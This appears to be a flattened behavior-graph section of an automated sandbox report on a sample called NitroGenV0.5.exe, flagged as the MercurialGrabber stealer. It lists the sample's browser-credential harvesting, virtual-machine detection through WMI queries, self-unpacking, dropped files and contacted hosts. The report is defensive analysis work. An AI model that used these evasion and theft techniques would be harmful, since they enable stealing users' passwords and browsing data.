                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 517177 URL: https://cdn.discordapp.com/... Startdate: 07/11/2021 Architecture: WINDOWS Score: 100 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Yara detected MercurialGrabber 2->45 47 C2 URLs / IPs found in malware configuration 2->47 6 NitroGenV0.5.exe 15 11 2->6         started        11 NitroGenV0.5.exe 9 2->11         started        13 cmd.exe 2 2->13         started        process3 dnsIp4 33 discord.com 162.159.136.232, 443, 49744, 49745 CLOUDFLARENETUS United States 6->33 35 ip-api.com 208.95.112.1, 49743, 49756, 80 TUT-ASUS United States 6->35 37 ip4.seeip.org 23.128.64.141, 443, 49742, 49755 JOESDATACENTERUS United States 6->37 27 C:\Users\user\AppData\...27itroGenV0.5.exe, PE32 6->27 dropped 29 C:\Users\...29itroGenV0.5.exe:Zone.Identifier, ASCII 6->29 dropped 49 Antivirus detection for dropped file 6->49 51 Detected unpacking (overwrites its own PE header) 6->51 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->53 15 conhost.exe 6->15         started        39 162.159.135.232, 443, 49757, 49758 CLOUDFLARENETUS United States 11->39 55 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 11->55 57 Tries to harvest and steal browser information (history, passwords, etc) 11->57 59 Queries memory information (via WMI often done to detect virtual machines) 11->59 17 conhost.exe 11->17         started        19 wget.exe 2 13->19         started        23 conhost.exe 13->23         started        file5 signatures6 process7 dnsIp8 31 cdn.discordapp.com 162.159.129.233, 443, 49741 CLOUDFLARENETUS United States 19->31 25 C:\Users\user\Desktop\...25itroGenV0.5.exe, PE32 19->25 dropped file9

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.